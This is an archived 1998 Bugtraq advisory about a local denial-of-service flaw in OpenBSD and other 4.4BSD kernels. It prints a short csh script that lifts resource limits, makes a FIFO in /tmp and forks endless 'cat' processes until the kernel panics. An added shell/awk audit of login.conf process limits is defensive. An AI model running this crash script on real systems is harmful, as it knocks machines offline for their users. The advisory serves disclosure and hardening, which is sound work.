OpenBSD mkfifo DOS attack

Summary
Description: You can run the *BSD kernel out of non-pageable memory by making a fifo (via mkfifo) and forking a bunch of processes trying to cat it.
Author: Jason Downs <downsj@DOWNSJ.COM>
Compromise: Crash the system (stupid DOS attack)
Vulnerable Systems: OpenBSD, presumably NetBSD, FreeBSD, BSDI
Date: 25 January 1998
Details


Date: Sun, 25 Jan 1998 15:54:25 -0800
From: Jason Downs <downsj@DOWNSJ.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Simple OpenBSD crash script

Here is a rather simple method of crashing most OpenBSD systems (and, I
assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).

Most, if not all, kernels have process limits high enough for a normal
user to run the kernel out of non-pageable map entries.  The easiest way
that I have found to do this is with the enclosed script.

If the per-user process/descriptor limits are high enough, running this script
will result in a kernel panic.

#!/bin/csh
set path = ( /usr/bin /usr/sbin /bin /sbin )

unlimit
cd /tmp
if ( -e fifo ) then
    rm fifo
endif
mkfifo fifo
while ( 1 )
    cat fifo >& /dev/null &
end

--
Jason Downs
downsj@downsj.com
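
The post ties the panic to per-user process and descriptor limits being high enough. The audit below is an added example, not part of the original post: it assumes the host defines limits through login.conf(5)-style classes, and the ceilings and sample classes are constructed for illustration.

```shell
# Added example: flag login classes whose hard limits are unset, unlimited or
# above a ceiling. Ceilings are assumed review thresholds, not from the post.
MAXPROC_CEIL=${MAXPROC_CEIL:-256}
OPENFILES_CEIL=${OPENFILES_CEIL:-1024}
# audit_login_conf [FILE]: print "class capability value verdict" lines.
# tc= inheritance is not resolved; an inherited limit shows as UNSET.
audit_login_conf() {
    awk -v pmax="$MAXPROC_CEIL" -v fmax="$OPENFILES_CEIL" '
    function verdict(v, ceil) {
        if (v == "") return "UNSET"
        if (v == "infinity" || v == "unlimited") return "UNLIMITED"
        return (v + 0 > ceil) ? "HIGH" : "ok"
    }
    function show(name, cap, v, ceil) {
        print name, cap, (v == "" ? "-" : v), verdict(v, ceil)
    }
    function report(   i, n, f, kv, caps, name) {
        if (rec == "") return
        n = split(rec, f, ":")
        name = f[1]; sub(/\|.*/, "", name)      # drop aliases after "|"
        split("", caps)                          # clear per-class capability map
        for (i = 2; i <= n; i++)
            if (split(f[i], kv, "=") == 2) caps[kv[1]] = kv[2]
        show(name, "maxproc-max", caps["maxproc-max"], pmax)
        show(name, "openfiles-max", caps["openfiles-max"], fmax)
        rec = ""
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }            # skip comments and blank lines
    {
        line = $0
        cont = sub(/\\[ \t]*$/, "", line)        # trailing backslash continues
        sub(/^[ \t]+/, "", line)
        rec = rec line
        if (!cont) report()
    }
    END { report() }
    ' "${1:--}"
}
sample_conf() {   # constructed sample, not a real host configuration
    cat <<'EOF'
default:\
    :maxproc-max=128:openfiles-max=512:
staff:\
    :maxproc-max=infinity:openfiles-max=4096:tc=default:
daemon:\
    :openfiles-max=256:
EOF
}
sample_conf | audit_login_conf
```

Classes reported as UNSET, UNLIMITED or HIGH are the ones where the script's `unlimit` would leave a normal user with enough headroom to matter.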

This page is part of Fyodor's exploit world.